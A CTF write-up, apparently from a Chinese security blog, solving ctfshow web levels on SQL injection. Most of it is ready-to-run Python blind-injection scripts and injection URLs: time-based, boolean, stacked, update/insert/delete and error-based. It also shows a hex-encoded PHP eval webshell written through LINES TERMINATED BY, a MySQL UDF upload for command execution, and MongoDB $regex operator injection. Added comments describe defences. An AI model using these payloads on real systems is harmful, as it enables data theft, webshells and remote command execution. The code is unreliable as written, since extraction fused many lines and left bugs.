# Cartesian-product delay (six information_schema tables this time) combined with the
# `regexp('^{}')` prefix search, so `payload.format(flag + j, bypass)` fills both
# placeholders and `i` is only a retry counter. Window (3, 5) s. The regex-metacharacter
# caveat applies: `str` includes `(`, `)`, `{`, `}` and `-`, which regexp interprets.
# -- coding:UTF-8 -- # Author:孤桜懶契 # Date:2021/8/1 # blog: gylq.gitee.io import requests import time bypass="select count(*) from information_schema.schemata a, information_schema.tables b, information_schema.tables c, information_schema.schemata d, information_schema.schemata e, information_schema.schemata f" url = "http://d82b1a0b-aba4-4fed-aa83-62d59d7df4ee.challenge.ctf.show:8080/api/" str = "01234567890abcdefghijklmnopqrstuvwxyz{}-()_,," flag = "" #1) and if((database())regexp('^ctfshow'),(select count(*) from information_schema.schemata a, information_schema.tables b, information_schema.tables c, information_schema.schemata d, information_schema.schemata e, information_schema.schemata f),0)# #payload = "1) and if((database())regexp('^{}'),({}),0)#" #payload = "1) and if((select table_name from information_schema.tables where table_schema=database() limit 0,1)regexp('^{}'),({}),0)#" #payload = "1) and if((select column_name from information_schema.columns where table_schema=database() and table_name='ctfshow_flagxcac' limit 1,1)regexp('^{}'),({}),0)#" payload = "1) and if((select flagaabcc from ctfshow_flagxcac limit 0,1)regexp('^{}'),({}),0)#"
n = 0
for i in range(0, 666): for j in str: data = { "ip": payload.format(flag + j,bypass), "debug": '0' } start = time.time() res = requests.post(url, data) end = time.time() if end - start > 3and end - start < 5: flag += j n += 1 print('[*] 开始盲注第{}位'.format(n)) print(flag) if j == "}": print('[*] flag is {}'.format(flag)) exit() break
# Time-based search sent through the `u` GET parameter: the inner query `sql` is inserted
# as the first `{}` of `payload`, whose `concat(if(...,sleep(0.10),0),1)` wrapper keeps
# the expression a valid string. NOTE(review): the delay is only 0.10 s per evaluation yet
# the acceptance window is (2, 3) s — presumably the expression is evaluated once per row
# of the outer query so the sleeps add up; confirm against the challenge. `url`, `str`,
# `requests` and `time` are defined outside this excerpt; the loop was split across two
# lines by extraction.
flag = "" #------------------------------------------------------------------------------------------------------------------------------------------------------------- #查表 # sql= "select group_concat(table_name) from information_schema.tables where table_schema=database()" #查字段 # sql= "select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='ctfshow_flaga'" #查flag sql= "select flagaabc from ctfshow_flaga" #------------------------------------------------------------------------------------------------------------------------------------------------------------- payload = "concat(if(substr(({}),{},1)='{}',sleep(0.10),0),1)"
#concat(if(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),1,1)='c',sleep(0.10),0),1)
n = 0
for i in range(0, 666): for j in str: params = { 'u' : payload.format(sql,i,j) }
start = time.time() res = requests.get(url = url, params = params) end = time.time() if end - start > 2and end - start < 3: flag += j n += 1 print('[*] 开始盲注第{}位'.format(n)) print(flag) if j == "}": print('[*] flag is {}'.format(flag)) exit() break
# generateNum(num) -> str: builds the SQL expression 'true+true+...' with `num` terms, so
# an integer can be written without digit characters. Returns 'true' for num == 1; for
# larger values appends "+true" num-1 times. For num <= 0 the range is empty and 'true'
# is returned as well (the `def` keyword was fused with the name by extraction).
defgenerateNum(num): res = 'true' if num == 1: return res else: for i in range(num-1): res += "+true" return res
# Boolean-based search with no digits in the request: both the substr position and the
# ASCII code being tested are rendered by generateNum() as `true+true+...`, and the
# oracle is `"userAUTO"` in the response when `if(...)` selects `username`.
# NOTE(review): `j` iterates over `range(32,126)` (ints), so `if j == "}"` is never true
# and the `exit()` is unreachable — the run only ends when a position yields no match or
# the outer range is exhausted; `if chr(j) == "}"` is the intended check. `requests` is
# imported outside this excerpt. The trailing `#ctfshow{...}` comment is the author's result.
url = "http://ce009cf2-8652-4737-ba07-b3bfc3bc3a4a.challenge.ctf.show:8080/api/" str = "01234567890abcdefghijklmnopqrstuvwxyz{}-()_,," flag = ""
#************************************************************************************************************************************************************* #--------查表 #sql= "select group_concat(table_name) from information_schema.tables where table_schema=database()" #--------查字段 #sql= "select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='ctfshow_flagas'" #--------查flag sql= "select flagasabc from ctfshow_flagas" #************************************************************************************************************************************************************* payload = "if(ascii(substr(({}),{},true))=({}),username,false)"
#计数 n = 0
for i in range(1, 666): for j in range(32,126): result_num=generateNum(i) result=generateNum(j) params = { 'u' : payload.format(sql,result_num,result) }
res = requests.get(url = url, params = params) if"userAUTO"in res.text: flag += chr(j) n += 1 print('[*] 开始盲注第{}位'.format(n)) print(flag) if j == "}": print('[*] flag is {}'.format(flag)) exit() break #ctfshow{728dd1b0-7547-401d-b358-2d2207f3d13c}
SET @tn = 'hahaha'; //存储表名 SET @sql = concat('select * from ', @tn); //存储SQL语句 PREPARE name FROM @sql; //预定义SQL语句 EXECUTE name; //执行预定义SQL语句 (DEALLOCATE || DROP) PREPARE sqla; //删除预定义SQL语句
因为concat连接之后直接就是字符串,所以就直接构造payload
http://76114b3b-7ffd-4016-8b00-b96feb693fd8.challenge.ctf.show:8080/api/?username=ctfshow';show tables;prepare gylq from concat('s','elect',' * from ctfshow_flagasa');execute gylq;--+
web226
预处理语句 PREPARE ... FROM 后面可以直接跟十六进制字符串,所以可以有更骚的姿势:直接将 select * from ctfsh_ow_flagas 转换成 0x73656C656374202A2066726F6D2063746673685F6F775F666C61676173,就可以直接执行该语句
payload
http://bbec116e-8f61-487c-8966-9384be4efe14.challenge.ctf.show:8080/api/?username=userAUTO';prepare gylq from 0x73656C656374202A2066726F6D2063746673685F6F775F666C61676173;execute gylq--+
http://faa7806b-aae1-4405-8c64-1600655bcd26.challenge.ctf.show:8080/api/?username=user1';prepare gylq from 0x73656C656374202A2066726F6D20696E666F726D6174696F6E5F736368656D612E726F7574696E6573;execute gylq;
http://abd0d622-b6b8-48c7-98f3-9a49f3996b1b.challenge.ctf.show:8080/api/?username=user1';prepare gylq from 0x73656C656374202A2066726F6D2063746673685F6F775F666C616761736161;execute gylq;
web229
和上题一样,估计没招了
http://74ea40ed-fc20-471c-8d2e-05cbd44aadad.challenge.ctf.show:8080/api/?username=user1';prepare gylq from 0x73656C656374202A2066726F6D20666C6167;execute gylq;
web230
堆叠注入的精髓就是预处理和转十六进制么,和上题一样
http://bde7f4f9-1def-42cf-afee-da3025b6550a.challenge.ctf.show:8080/api/?username=user1';prepare gylq from 0x73656C656374202A2066726F6D20666C61676161626278;execute gylq;
# def generateNum(num): # res = 'true' # if num == 1: # return res # else: # for i in range(num-1): # res += "+true" # return res
# Boolean-based search through an update form: the injected condition goes in
# `username`, `password` is set to the current position `i` so each request changes the
# row, and the oracle is the JSON-escaped `\u66f4\u65b0\u6210\u529f` ("更新成功") in the
# raw response. `requests` is imported outside this excerpt; `str` shadows the builtin;
# `ifr"..."in` is `if r"..." in` with spaces lost. Earlier payloads kept as comments.
url = "http://06b28180-71ea-4f89-a05a-7d6baaf18696.challenge.ctf.show:8080/api/" str = "01234567890abcdefghijklmnopqrstuvwxyz{}-()_,," flag = "" #password=1234567811&username=ctfshow' and if(substr(database(),1,1)='c',1,0)# #************************************************************************************************************************************************************* #--------查表 #sql= "select group_concat(table_name) from information_schema.tables where table_schema=database()" #--------查字段 #sql= "select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='flaga'" #--------查flag sql= "select group_concat(flagas) from flaga" #************************************************************************************************************************************************************* payload = "ctfshow' and if(substr(({}),{},1)='{}',1,0)#"
#计数 n = 0
for i in range(1, 666): for j in str: params = { 'username' : payload.format(sql,i,j), 'password' : "{}".format(i) } res = requests.post(url = url, data = params) #print(res.text) ifr"\u66f4\u65b0\u6210\u529f"in res.text: flag += j n += 1 print('[*] 开始盲注第{}位'.format(n)) print(flag) if j == "}": print('[*] flag is {}'.format(flag)) exit() break
# def generateNum(num): # res = 'true' # if num == 1: # return res # else: # for i in range(num-1): # res += "+true" # return res
# Same update-form boolean search as the previous level with a different table/column
# (`flagass` in `flagaa`); oracle is the escaped `\u66f4\u65b0\u6210\u529f` ("更新成功")
# in the raw response, `password` carries the position `i`. `requests` is imported
# outside this excerpt; `str` shadows the builtin.
url = "http://258da519-591d-4f61-b9af-c91ccb7af34f.challenge.ctf.show:8080/api/" str = "01234567890abcdefghijklmnopqrstuvwxyz{}-()_,," flag = "" #password=1234567811&username=ctfshow' and if(substr(database(),1,1)='c',1,0)# #************************************************************************************************************************************************************* #--------查表 #sql= "select group_concat(table_name) from information_schema.tables where table_schema=database()" #--------查字段 #sql= "select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='flagaa'" #--------查flag sql= "select group_concat(flagass) from flagaa" #************************************************************************************************************************************************************* payload = "ctfshow' and if(substr(({}),{},1)='{}',1,0)#"
#计数 n = 0
for i in range(1, 666): for j in str: params = { 'username' : payload.format(sql,i,j), 'password' : "{}".format(i) } res = requests.post(url = url, data = params) ifr"\u66f4\u65b0\u6210\u529f"in res.text: flag += j n += 1 print('[*] 开始盲注第{}位'.format(n)) print(flag) if j == "}": print('[*] flag is {}'.format(flag)) exit() break
# def generateNum(num): # res = 'true' # if num == 1: # return res # else: # for i in range(num-1): # res += "+true" # return res
url = "http://8feb46d5-de26-4836-807f-3d7218bcb7ae.challenge.ctf.show:8080/api/" str = "01234567890abcdefghijklmnopqrstuvwxyz{}-()_,," flag = "" #password=1234567811&username=ctfshow' and if(substr(database(),1,1)='c',1,0)# #************************************************************************************************************************************************************* #--------查表 #sql= "selectgroup_concat(table_name) from information_schema.tables where table_schema=database()" #--------查字段 #sql= "selectgroup_concat(column_name) from information_schema.columns where table_schema=database() and table_name='flag233333'" #--------查flag sql= "selectgroup_concat(flagass233) from flag233333" #************************************************************************************************************************************************************* payload = "ctfshow' and if(substr(({}),{},1)='{}',1,0)#" #计数 n = 0 for i in range(1, 666): for j in str: params = { 'username' : payload.format(sql,i,j), 'password' : "{}".format(i) } res = requests.post(url = url, data = params) if r"\u66f4\u65b0\u6210\u529f" in res.text: flag += j n += 1 print('[*] 开始盲注第{}位'.format(n)) print(flag) if j == "}": print('[*] flag is {}'.format(flag)) exit() break
web234
脚本跑不动了,过滤了单引号,这题考的是\实现单引号逃逸
原来的语句 update ctfshow_user set pass = '{$password}'where username = '{$username}'; 加上\逃逸单引号 update ctfshow_user set pass = '\'where username = '{$username}'; pass里面的内容则变成' where username = username里面的值我们可以随意控制
查表payload
username=,username=(selectgroup_concat(table_name) from information_schema.tables where table_schema=database())#&password=\
查字段payload
username=,username=(selectgroup_concat(column_name) from information_schema.columns where table_schema=database() and table_name=0x666C6167323361)#&password=\
查flag
username=,username=(selectgroup_concat(flagass23s3) from flag23a)#&password=\
username=,username=(selectgroup_concat(table_name) from mysql.innodb_table_stats )#&password=\
payload查flag
username=,username=(select`2`from (select1,2,3unionselect * from flag23a1)a limit1,1) #&password=\
web236
他多过滤了一个flag,一样可以用上一个payload
username=,username=(select`2`from (select1,2,3unionselect * from flaga)a limit1,1) #&password=\
我感觉没过滤,如果真过滤了,也可以base64转过去
username=,username=(select to_base64(`2`) from (select 1,2,3 union select * from flaga)a limit 1,1) #&password=\
web237
经典insert注入
查表
password=gylq&username=gylqtest',(selectgroup_concat(table_name) from information_schema.tables where table_schema=database()));#
查字段
password=gylq&username=gylqtest',(selectgroup_concat(column_name) from information_schema.columns where table_schema=database() and table_name='flag'));#
查flag
password=gylq&username=gylqtest',(select flagass23s3 from flag));#
url="http://108f39e9-3737-4b40-9285-4441a3360741.challenge.ctf.show:8080/api/insert.php" flag="flag" str="ab" payload="gylq',(select(group_concat(flag))from({})))#" for a in str: for b in str: for c in str: for d in str: for e in str: random=flag+a+b+c+d+e data = { 'username' : payload.format(random) , 'password' : "flag" } res = requests.post(url,data)
# def generateNum(num): # res = 'true' # if num == 1: # return res # else: # for i in range(num-1): # res += "+true" # return res
# Boolean-blind driver against a DELETE endpoint. The oracle is the "删除成功"
# (delete succeeded) message, JSON-escaped as \u5220\u9664\u6210\u529f.
# NOTE: line breaks were lost in extraction; on the second physical line everything after
# the first "#" — including the `payload = ...` assignment — is comment text as pasted.
# Loop shape worth noting: positions 20..43 of the flag are probed and the `id` sent is
# `k = i - 19`, i.e. a fresh row id per position — consistent with each successful probe
# deleting a row (presumably the first 19 characters were recovered in an earlier run).
# Defender's view: a DELETE whose WHERE clause is built from request input is both an
# injection and a data-loss bug; a parameterized statement fixes both, and a run of DELETEs
# with consecutive ids and near-identical conditions is the signature to alert on.
url = "http://6786d08e-8031-4544-aa67-f4b3028d2c8d.challenge.ctf.show:8080/api/delete.php" str = "01234567890abcdefghijklmnopqrstuvwxyz{}-()_,," flag = ""
#************************************************************************************************************************************************************* #--------list tables #sql= "select group_concat(table_name) from information_schema.tables where table_schema=database()" #--------list columns #sql= "select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='ctfshow_flagas'" #--------read flag #sql= "select flagasabc from ctfshow_flagas" #************************************************************************************************************************************************************* payload = "{} and if(substr((select group_concat(flag) from flag),{},1)='{}',1,0)"
# counter n = 0
for i in range(20, 44): k=i-19 for j in str: params = { 'id' : payload.format(k,i,j) } res = requests.post(url = url, data = params) if r"\u5220\u9664\u6210\u529f" in res.text: flag += j n += 1 print('[*] 开始盲注第{}位'.format(n)) print(flag) if j == "}": print('[*] flag is {}'.format(flag)) exit() break
# def generateNum(num): # res = 'true' # if num == 1: # return res # else: # for i in range(num-1): # res += "+true" # return res
url = "http://f0b20d14-9c8f-49ed-8808-2ebc4115c907.challenge.ctf.show:8080/api/delete.php" str = "01234567890abcdefghijklmnopqrstuvwxyz{}-()_,," flag = "" #************************************************************************************************************************************************************* #--------查库名 #sql="database()" #--------查表 #sql= "selectgroup_concat(table_name) from information_schema.tables where table_schema=database()" #--------查字段 #sql= "selectgroup_concat(column_name) from information_schema.columns where table_schema=database() and table_name='flag'" #--------查flag sql= "select flag from flag" #************************************************************************************************************************************************************* payload = "if(substr(({}),{},1)='{}',sleep(0.1),0)" #计数 n = 0 for i in range(1,666): for j in str: data = { 'id' : payload.format(sql,i,j) } start = time.time() res = requests.post(url = url, data = data) end = time.time() if end-start > 2 and end-start < 3: flag += j n += 1 print('[*] 开始盲注第{}位'.format(n)) print(flag) if j == "}": print('[*] flag is {}'.format(flag)) exit() break
$conn = new mysqli($dbhost,$dbuser,$dbpwd,$dbname); if(mysqli_connect_errno()){ die(json_encode(array(mysqli_connect_error()))); } $conn->query("set name $charName");
$sql = "select * from ctfshow_user where username={$filename};"; $conn->query("set name $charName"); $result = $conn->query($sql); while ($row = mysqli_fetch_array($result)){ echo "u:".$row['username']; echo "p:".$row['pass']; } if(mysqli_affected_rows($conn)){ $ret['msg']="导出{$filename}成功"; }else{ $ret['msg']="导出{$filename}失败"; } mysqli_close($conn); }
# def generateNum(num): # res = 'true' # if num == 1: # return res # else: # for i in range(num-1): # res += "+true" # return res
# Boolean-blind driver against dump.php. The oracle is the literal "u:ctfshowp" — the
# username/password echo the back end shown earlier on this page prints — appearing in the
# response. The payload starts with its own quote because that back end interpolates
# $filename into the WHERE clause unquoted (per the PHP excerpt above; confirm).
# NOTE: line breaks were lost in extraction; on the second physical line everything after
# the first "#" is comment text as pasted, so the active `sql=` there is commented out too.
# Defender's view: a "dump/export" endpoint that builds its query from the filename field
# needs a bound parameter and should not echo row contents back to the caller; the alert
# is the usual burst of single-character-variant POSTs to one endpoint.
url = "http://9c4ff2fb-3479-4628-be92-f7dff3560001.challenge.ctf.show:8080/dump/dump.php" str = "01234567890abcdefghijklmnopqrstuvwxyz{}-()_,," flag = ""
#password=1234567811&username=ctfshow' and if(substr(database(),1,1)='c',1,0)# #************************************************************************************************************************************************************* #--------list tables sql= "select group_concat(table_name) from information_schema.tables where table_schema=database()" #--------list columns #sql= "select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='flag233333'" #--------read flag #sql= "select group_concat(flagass233) from flag233333" #*************************************************************************************************************************************************************
payload = "'ctfshow' and if(substr(({}),{},1)='{}',1,0)"
# counter n = 0
for i in range(1, 666): for j in str: params = { 'filename' : payload.format(sql,i,j), } res = requests.post(url = url, data = params) if "u:ctfshowp" in res.text: flag += j n += 1 print('[*] 开始盲注第{}位'.format(n)) print(flag) if j == "}": print('[*] flag is {}'.format(flag)) exit() break
filename=gylq.jpg' LINES TERMINATED BY 0x0A3C3F706870206576616C28245F524551554553545B315D293B3F3E0A#
在上传.user.ini文件
filename=.user.ini' LINES TERMINATED BY 0x0A6175746F5F70726570656E645F66696C653D67796C712E6A70670A#
接着访问index.php
getshell拿flag
web244
终于来到报错模块了
//备份表 $sql = "select id,username,pass from ctfshow_user where id = '".$id."' limit 1;";
经典报错注入拿表
http://8b891a41-b3c2-4892-96e2-88623f86dd70.challenge.ctf.show:8080/api/?id=1' or updatexml(1,concat(0x3d,(select group_concat(table_name) from information_schema.tables where table_schema=database())),1)%23
拿字段
http://8b891a41-b3c2-4892-96e2-88623f86dd70.challenge.ctf.show:8080/api/?id=1' or updatexml(1,concat(0x3d,(select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='ctfshow_flag')),1)%23
-- Items 4 and 5 of an error-based technique list: each statement is shaped so the server
-- raises a "Duplicate column name" error whose message carries the value of interest.
-- Nothing is disclosed unless the application forwards raw database errors to the client,
-- so the server-side controls are (a) parameterized queries and (b) logging the real error
-- while returning a generic message. (Spaces and line breaks were lost in extraction:
-- "selectNAME_CONST" and the three statements of item 5 run together.)
4. Name_Const(>5.0.12) select * from (selectNAME_CONST(version(),0),NAME_CONST(version(),0))x;
5. Join select * from(select * from mysql.user a join mysql.user b)c; select * from(select * from mysql.user a join mysql.user b using(Host))c; select * from(select * from mysql.user a join mysql.user b using(Host,User))c;
拿表
http://0fbee15d-4936-43e7-a8f1-3f8e0f8e84c5.challenge.ctf.show:8080/api/?id=1' or extractvalue(1,concat(0x3d,(select group_concat(table_name) from information_schema.tables where table_schema=database())))%23
拿字段
http://0fbee15d-4936-43e7-a8f1-3f8e0f8e84c5.challenge.ctf.show:8080/api/?id=1' or extractvalue(1,concat(0x3d,(select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='ctfshow_flagsa')))#
拿flag
前部分 ctfshow{b2cc23cb-316b-4cea-b9ea 语句 http://0fbee15d-4936-43e7-a8f1-3f8e0f8e84c5.challenge.ctf.show:8080/api/?id=1' or extractvalue(1,concat(0x3d,(select group_concat(flag1) from ctfshow_flagsa)))%23 后部分 a-b9ea-9807145c946a} 语句 http://0fbee15d-4936-43e7-a8f1-3f8e0f8e84c5.challenge.ctf.show:8080/api/?id=1' or extractvalue(1,concat(0x3d,(select right(group_concat(flag1),20) from ctfshow_flagsa)))%23 重复部分删除 ctfshow{b2cc23cb-316b-4cea-b9ea-9807145c946a}
http://b8b5d561-57a2-477f-9c61-17caf1ce6094.challenge.ctf.show:8080/api/?id=1' and (select count(*) from information_schema.tables group by concat((select column_name from information_schema.columns where table_schema=database() and table_name='ctfshow_flags' limit 1,1),floor(rand(0)*2))) %23
flag,没有长度限制
http://b8b5d561-57a2-477f-9c61-17caf1ce6094.challenge.ctf.show:8080/api/?id=1' and (select count(*) from information_schema.tables group by concat((select flag2 from ctfshow_flags limit 0,1),floor(rand(0)*2))) %23
union报错查询查flag
http://b8b5d561-57a2-477f-9c61-17caf1ce6094.challenge.ctf.show:8080/api/?id=1' union select 1,count(*),concat((select flag2 from ctfshow_flags),floor(rand(0)*2)) a from information_schema.tables group by a %23
web247
过滤了向下取整floor,没过滤ceil向上取整
http://b89fec88-85a4-4e59-b9b2-d6c71204e161.challenge.ctf.show:8080/api/?id=1' and (select count(*) from information_schema.tables group by concat((select `flag?` from ctfshow_flagsa),ceil(rand(0)*2))) %23
web248
考点udf注入
一、什么是udf
udf 全称为:user defined function,意为用户自定义函数;用户可以添加自定义的新函数到MySQL中,以达到功能的扩充,调用方式与一般系统自带的函数相同,例如 concat(),user(),version()等函数。
select unhex(concat(load_file('/usr/lib/mariadb/plugin/a.txt'),load_file('/usr/lib/mariadb/plugin/b.txt'),load_file('/usr/lib/mariadb/plugin/c.txt'),load_file('/usr/lib/mariadb/plugin/d.txt'))) into dumpfile '/usr/lib/mariadb/plugin/udf.so'
最后我们创建sys_eval这个函数来进行命令执行
create function sys_eval returns string soname 'udf.so'
# Fragment of the writeup's upload script; `udf`, `udf_text`, `text`, `payload`, `acquire`
# and `url` are bound earlier, outside this excerpt, and `requests` is imported there.
# (Line breaks were lost in extraction — statements on one physical line are fused.)
# What is visible: a 20000-character string is cut into four 5000-character pieces keyed by
# the names in `text`; each piece is sent in a GET, a 404 is reported as a bad URL, and the
# follow-up request is treated as a success when "load_file" appears in its body.
# Defender's view: four oversized GETs to the same endpoint carrying long hex runs, followed
# by the SQL on the preceding lines, is the chain to correlate; the privilege and file-path
# hardening noted on those SQL statements is what prevents it.
for i in range(0,20000,5000): end = i+5000 udf_text.append(udf[i:end])
p = dict(zip(text,udf_text))
for t in text: param=payload.format(p[t],t) get_url = url + param res = requests.get(get_url) print("[*]",end="") code = res.status_code print(code,end="") if code==404: print("你输入的URL可能出错") acq=acquire.format(t) data=url+acq res = requests.get(url=data) if"load_file"in res.text: print("-->成功插入{}.txt".format(t))
# Regex-based blind extraction through MongoDB query-operator injection: the form fields
# are posted as username[$regex] / password[$regex], which PHP parses into arrays, and the
# back end presumably passes them into the query document unchanged. The oracle is the
# "登陆成功" (login succeeded) message, JSON-escaped as \u767b\u9646\u6210\u529f; the
# password prefix is grown one character per confirmed match.
# NOTE: line breaks were lost in extraction; `ifr"..."in` on the last line is the original
# `if r"..." in` with its spaces dropped.
# Defender's view: cast credential fields to strings (reject array values) and strip or
# reject keys beginning with "$" before building the query; compare passwords against a
# stored hash rather than querying on the cleartext value at all; and alert on "[$" in
# form field names.
url = "http://a2efa0f0-f634-4621-bd4a-e96a4f1b0196.challenge.ctf.show:8080/api/" str = "01234567890abcdefghijklmnopqrstuvwxyz{}-()_,," flag = ""
payload_user = "flag.*" payload_pass = "^{}.*"
n = 0
for i in range(1, 666): for j in str: data = { 'username[$regex]':payload_user, 'password[$regex]':payload_pass.format(flag+j) } res = requests.post(url = url, data=data) ifr"\u767b\u9646\u6210\u529f"in res.text: flag += j n += 1 print('[*] 开始盲注第{}位'.format(n)) print(flag) if j == "}": print('[*] flag is {}'.format(flag)) exit() break